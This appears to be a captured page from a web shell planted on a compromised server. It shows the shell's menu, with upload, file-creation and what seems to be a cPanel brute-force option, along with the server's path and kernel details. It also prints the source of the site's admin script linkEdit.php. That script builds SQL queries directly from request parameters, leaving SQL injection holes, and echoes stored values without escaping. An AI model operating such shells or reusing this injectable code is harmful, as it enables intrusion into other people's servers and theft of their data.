Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
50mmla
/
admin
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/50mmla/admin/linkEdit.php
<? include_once('../includes/static/configure.php'); include_once('../includes/static/util.php'); include_once('../includes/static/dbcon.php'); include_once('../includes/static/gdimg.php'); include_once('../includes/static/sessions.php'); include_once('includes/static/util.php'); include_once('includes/appTop.php'); $page_id = str_replace(".php","",basename($_SERVER['PHP_SELF'])); if(!has_permission($page_id)){ die("You don't have permission to view this page!"); } ?> <? $link_id = 0; if(isset($_REQUEST['linkId'])){ $link_id = $_REQUEST['linkId']; } if(isset($_REQUEST['editLink'])){ $sql = "UPDATE 50mm_links SET name = '".$_REQUEST['name']."', url = '".$_REQUEST['url']."', user_id = '".$_REQUEST['userId']."' WHERE link_id = '$link_id'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } } include_once('includes/header.php'); //content $sql = "SELECT link_id,name,url,user_id FROM 50mm_links WHERE link_id = '$link_id'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); $uid = $row['user_id']; if(empty($uid)){$uid=0;} $link_name = $row['name']; $link_url = $row['url']; ?> <script> divs = new Array('url'); </script> <form action="<?echo $_SERVER['PHP_SELF']?>" method="POST" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'error');"> Name:<br> <input class="field" name="name" style="width:250px" value="<?echo $link_name;?>"><br> Link:<span id="errurl" class="error" style="visibility:hidden;"> *</span><br> <input class="field" name="url" style="width:250px" value="<?echo $link_url;?>"><br> Editor:<br> <? $sql = "SELECT username,user_id FROM 50mm_users WHERE user_type = 'EDITOR' ORDER BY username ASC;"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $options = '<select name="userId">'."\n"; $options.= '<option value="">-- no one --</option>'."\n"; while($row = $db->sql_fetchrow($result)){ if($uid == $row['user_id']){ $options.= '<option value="'.$row['user_id'].'" selected>'.$row['username'].'</option>'."\n"; }else{ $options.= '<option value="'.$row['user_id'].'">'.$row['username'].'</option>'."\n"; } } $options.= '</select>'."\n"; echo $options; ?> <br> <input name="editLink" type="submit" class="button" value="Edit Link"> <div id="error" class="error" style="visibility:hidden;">Please correct the fields marked by *</div> <input name="linkId" type="hidden" value="<?echo $link_id;?>"> <input name="action" type="hidden" value="edit"> </form> <? include_once('includes/linkExplorer.php'); ?> <br> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>